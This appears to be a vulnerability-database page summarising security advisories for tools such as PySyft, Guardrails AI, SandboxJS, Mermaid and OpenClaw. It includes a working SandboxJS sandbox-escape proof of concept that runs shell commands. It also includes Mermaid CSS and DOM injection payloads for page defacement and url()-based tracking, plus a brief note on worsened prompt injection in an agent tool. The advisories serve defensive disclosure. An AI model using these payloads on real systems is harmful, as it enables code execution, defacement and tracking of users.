Arbitrary code execution occurs in the llm CLI tool (versions through 0.27.1) when attackers social-engineer victims into running crafted commands containing malicious Python code in the --functions argument. The tool directly executes this code via unsafe exec() without sanitization, enabling full system compromise. CVSS 9.8 assigns network attack vector and no authentication, but real-world exploitation requires local command execution by a tricked user, creating a significant disparity between the vector and actual attack prerequisites. EPSS score of 0.02% (5th percentile) suggests minimal automated exploitation risk, and no active exploitation or public POC has been identified at time of analysis.
Remote code execution in PySyft Datasite/Server versions 0.9.5 and earlier allows unauthenticated attackers to execute arbitrary Python code on the server through the function submission mechanism. The vulnerability stems from insufficient validation and sandboxing of user-submitted Python functions decorated with @sy.syft_function(), which are executed using unsafe exec() and eval() calls after approval. With an EPSS score of 0.04% and no current KEV listing, this appears to be a high-severity vulnerability without confirmed active exploitation.
Remote code execution in Cognee v0.4.0 and earlier allows unauthenticated attackers to execute arbitrary Python code via the notebook cell execution API endpoint. The vulnerability stems from unsafe use of Python's exec() function without sandboxing or validation, enabling complete system compromise with server process privileges. While not actively exploited (not in KEV), the vulnerability is automatable with total technical impact per SSVC framework, though EPSS indicates low exploitation probability at 0.06%.
Remote code execution in Guardrails AI through version 0.6.7 occurs when installing validator packages via the Hub mechanism. The guardrails hub install command dynamically executes post-installation scripts from Hub manifests without validating the script path or content, allowing attackers who publish malicious packages to achieve arbitrary code execution on victim systems during package installation. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N) but only 0.06% EPSS (18th percentile), this represents a supply chain attack requiring user-initiated installation rather than widespread automated exploitation. No active exploitation confirmed (not in CISA KEV), and patch availability not confirmed from available data.
Arbitrary code execution in optimate's neural_magic_training.py allows remote attackers to execute Python code by supplying a malicious directory path containing a crafted module.py file. The _load_model() function directly executes file contents via Python's exec() without validation. CVSS 9.8 reflects network vector with no authentication, but EPSS score of 0.02% (5th percentile) indicates very low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). Vulnerability exists in commit a6d302f912b481c94370811af6b11402f51d377f from July 2024. Affects organizations using optimate for neural network model optimization.
Remote code execution in superduper (Python library) through version 0.10.0 allows unauthenticated network attackers to execute arbitrary system commands by submitting malicious query strings with embedded Python code. The _parse_op_part() function in query.py uses unsafe eval() with inadequate context restrictions, enabling attackers to import modules (such as os) and achieve complete server compromise. EPSS score is low (0.07%, 20th percentile) and no active exploitation is confirmed (CISA KEV absent), but SSVC framework rates technical impact as total. User interaction is required (CVSS UI:R), reducing automated exploitation risk. Authentication requirements not confirmed from available data - CVSS vector shows PR:N (no privileges required) but UI:R suggests user-triggered queries.
HTTP::Tiny versions before 0.093 for Perl fail to validate carriage return and line feed (CRLF) characters in HTTP request lines and header values, allowing attackers who control input URLs or headers to inject additional HTTP headers and smuggle requests to upstream servers. Remote unauthenticated attackers can exploit this via crafted URLs passed to webhook or URL fetch endpoints, achieving limited information disclosure and integrity compromise. EPSS score of 0.03% (percentile 7%) indicates low practical exploitation probability despite network-vector accessibility.
### Summary Sandbox-defined functions expose `Function.caller`, allowing sandboxed code to recover the internal `LispType.Call` runtime callback. That callback can then be invoked with attacker-controlled fake context and obj values to extract blocked host statics, recover the real host Function constructor, and execute arbitrary host JavaScript. ### Details In [executorUtils.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/executorUtils.ts#L239-L282) `createFunction()` constructs normal host JS functions, and because these are ordinary host functions, sandbox code can observe: ```js function f(){ return f.caller } ``` That leaks the host-side callback that invoked the sandbox function. This leaked callback is the internal `LispType.Call` op, which is registered in [call.ts](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L16-L17). The leaked callback accepts a **params** object from the attacker and uses its fields without any authentication checks. if you looked at those branches [call.ts:47](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L47-L55), [call.ts:70](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L70), [call.ts:149](https://github.com/nyariv/SandboxJS/blob/1e6785658c94f5f2fb8e4a02cfcf1e7821b8be7f/src/executor/ops/call.ts#L149-L153). This means the attacker controls `obj.context`, `obj.prop`, `obj.get`, `context.evals.get` and `a`. This can lead to direct invocation of an internal primitive with forged operands ### PoC ```js const sandb = require('@nyariv/sandboxjs').default; const sand = new sandb(); const payload = ` const callOp = (function fn() { return fn.caller; })(); function makeContext(capture = () => {}) { return { ctx: { options: 0 }, evals: { get: capture } }; } function leakStatic(obj, prop) { let leaked; callOp({ done() {}, a() {}, b: [], obj: { context: obj, prop, get() {} }, context: makeContext((fn) => (leaked = fn, () => 1)) }); return leaked; } function callDirect(fn, args) { let value; callOp({ done(_, result) { value = result; }, a() {}, b: args, obj: fn, context: makeContext() }); return value; } callDirect(leakStatic(Object, 'defineProperty'), [ leakStatic, 'call', callDirect(leakStatic(Object, 'getOwnPropertyDescriptor'), [ callDirect(leakStatic(Object, 'getPrototypeOf'), [() => 0]), 'constructor' ]) ]); let hostFn; callOp({ done(_, result) { hostFn = result; }, a: leakStatic, b: [], obj: { context: 'return process.getBuiltinModule("child_process").execSync("whoami").toString()', get() {} }, context: makeContext() }); return hostFn(); `; console.log(sand.compile(payload)().run()); ``` ### Impact _Sandbox escape leads to RCE_
### Impact Mermaid's default configuration allows injecting CSS that applies outside of the Mermaid diagram via the `fontFamily`, `themeCSS`, and `altFontFamily` configuration options. Live demo: [mermaid.live](https://mermaid.live/edit#pako:eNpNjktLxDAUhf9KvFBR6JS-60QQfODKlUvJ5k6TtsEmKTHFGUP-u-mI6Nmdy3fOPR56wwVQSBIvtXSUeAaD0e4ZlZxPDChhcLxFfwiEauOuLq_9Afv30ZpVczpaITS5kGox1qF2gfSeBwYhJAnThAyz-ewntI68vG5-0z3Z7e7IA9OQwmglB-rsKlJQwircLPgNZeAmocTPAi4GXGfHgOkQYwvqN2PUbzJuGSegA84f0a0LRyeeJI4W_xChubCPcbQD2pwbgHo4Aq2aKmvbqq3zoiu7pizqFE6RybN9VFfFY1HWXRVS-Dr_zLObrt7_V_gGGXZlGg) Example code: ``` %%{init: {"fontFamily": "x;a{b} :not(&){background:green !important} c{d}"}}%% flowchart LR A --> B ``` The injected CSS exploits stylis's `&` (scope reference) handling. `:not(&)` escapes the `#mermaid-xxx` automatic scoping, applying styles to all page elements. Global at-rules (`@font-face`, `@keyframes`, `@counter-style`) are also injectable as stylis hoists them to top level. This allows page defacement and DOM attribute exfiltration via CSS `:has()` selectors. ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [64769738d5b59211e1decb471ffbaca8afec51aa](https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a9d9f0d8eb790349121508688cd338253fd80d76](https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76)) ### Workarounds If you can't upgrade mermaid, you can set the [`secure`](https://mermaid.js.org/config/schema-docs/config.html#secure) config value in the mermaid config to avoid allowing diagrams to modify `fontFamily`, `themeCSS`, `altFontFamily`, and `themeVariables`. Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will also prevent this. ### Credits Reported by @zsxsoft on behalf of @KeenSecurityLab
### Impact Under the default configuration, Mermaid state diagram's `classDef` allow DOM injection that escapes the SVG, although `<script>` tags are removed, preventing XSS. #### Proof-of-concept ``` stateDiagram-v2 classDef xss fill:red</style></svg><style>*{x:x;y:y;overflow:visible!important;contain:none!important;transform:none!important;filter:none!important;clip-path:none!important}</style><div style="x:x;y:y;color:red;font:5em/1 monospace;display:grid;place-items:center;z-index:2147483647;width:100vw;height:100vh;position:fixed;top:0;left:0;background:black">HACKED</div><svg><style>a:b [*] --> A:::xss ``` ### Patches - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [37ff937f1da2e19f882fd1db01235db4d01f4056](https://github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3](https://github.com/mermaid-js/mermaid/commit/4e2d512bf5bf6f9de1a8f0a48da78dc4d09ac4f3)) ### Workarounds If you can not update to a patched version, setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Credits Thanks to @zsxsoft from @KeenSecurityLab for reporting this vulnerability.
### Details The state diagram and any other diagram type that routes user-controlled style strings through createCssStyles parser for Mermaid v11.14.0 and earlier captures `classDef` values with an unrestricted regex: ```jison // packages/mermaid/src/diagrams/state/parser/stateDiagram.jison:83 <CLASSDEFID>[^\n]* { this.popState(); return 'CLASSDEF_STYLEOPTS' } ``` The value passes unsanitized through `addStyleClass()` -> `createCssStyles()` -> `style.innerHTML` (mermaidAPI.ts:418). A `}` in the value closes the generated CSS selector, and everything after becomes a new CSS rule on the page. ### PoC ``` stateDiagram-v2 classDef x }*{ background-image: url("http://media.giphy.com/media/SggILpMXO7Xt6/giphy.gif")} ``` Live demo: <https://mermaid.live/edit#pako:eNpFjzFvgzAQhf-KdVNbEcBgMHhtlkqtOnSJKi8ONsYKBmRMlRTx3-skanvTfbp7996t0IxSAYPZC6_2Rmgn7O4rQ00v5nmvWnRG29OKjqI5aTcug9wZK7RiaHH9A4fO-4kliVXSiFibqbvEzWjvnHxo_fI6vR3e6cGXyX2qTcvhcYMItDMSmHeLisAqZ8UVYeUDQhx8p6ziwEIrhTtx4MNVM4nhcxztrywE0h2wVvRzoGWS_z_8rahBKvcckntgmN5OAFvhDIzUNCZZQXCR5nVaZkUEF2BVFpOcEkoxxhUuyRbB980yjStapKHqoKFlhvPtB7BFZEU> ### Patches This has been patched in: - [v11.15.0](https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [e9b0f34d8d82a6260077764ee45e1d7d90957a0f](https://github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f)) - [v10.9.6](https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [8fead23c59166b7bab6a39eac81acebee2859102](https://github.com/mermaid-js/mermaid/commit/8fead23c59166b7bab6a39eac81acebee2859102)) ### Workarounds Setting [`"securityLevel": "sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will prevent this, by rendering the mermaid diagram in a sandboxed `<iframe>`. ### Impact Enables page defacement, user tracking via `url()` callbacks, and DOM attribute exfiltration via CSS `:has()` selectors.
OpenClaw before version 2026.4.20 fails to preserve untrusted labels on webhook-triggered cron agent output, allowing events to be recorded as trusted system events instead of untrusted events. This trust-labeling issue can strengthen prompt-injection attacks by rendering attacker-controlled webhook data as legitimate system events, though it does not directly bypass authentication, tool policy, or sandboxing controls.
OpenClaw versions 2026.4.5 through 2026.4.19 allow local attackers with user privileges to redirect credentialed MiniMax API requests to attacker-controlled servers via environment variable injection in workspace dotenv files, exposing MiniMax API keys in Authorization headers. The vulnerability requires user interaction (opening a malicious workspace) and local access but achieves high confidentiality impact by exfiltrating sensitive API credentials.
Remote code execution in OWASP BLT versions prior to 2.1.2 enables attackers to execute arbitrary code with repository write permissions via malicious GitHub pull requests. The vulnerability exploits a GitHub Actions workflow misconfiguration where pull_request_target triggers execute code directly from attacker-controlled forks without proper validation. EPSS data not available; no confirmed active exploitation (not in CISA KEV); publicly disclosed via GitHub Security Advisory GHSA-cgvj-qg2h-cqfh.
GuardDog versions 2.6.0 through 2.9.0 fail to escape terminal control characters in human-readable scan output, allowing malicious packages to inject ANSI or OSC escape sequences that can clear analyst terminals, rewrite CI logs, or inject spoofed content. The vulnerability affects file paths, code snippets, and messages parsed from package content and rendered directly to stdout without sanitization. Remote attackers can exploit this by distributing packages with specially crafted filenames or source code containing escape sequences, and requires only user interaction (running the scanner on the malicious package).
Remote code execution in angular-expressions versions ≤1.5.1 allows unauthenticated network attackers to escape the expression sandbox via malicious filter payloads and execute arbitrary system commands with no user interaction required. CVSS 9.3 (Critical) with confirmed public exploit code available. Vendor-released patch in version 1.5.2 addresses the sandbox escape. Affects applications using angular-expressions as a standalone module for evaluating user-supplied Angular.JS expressions.
Quick Facts
- Typical Severity
- CRITICAL
- Category
- web
- Total CVEs
- 4842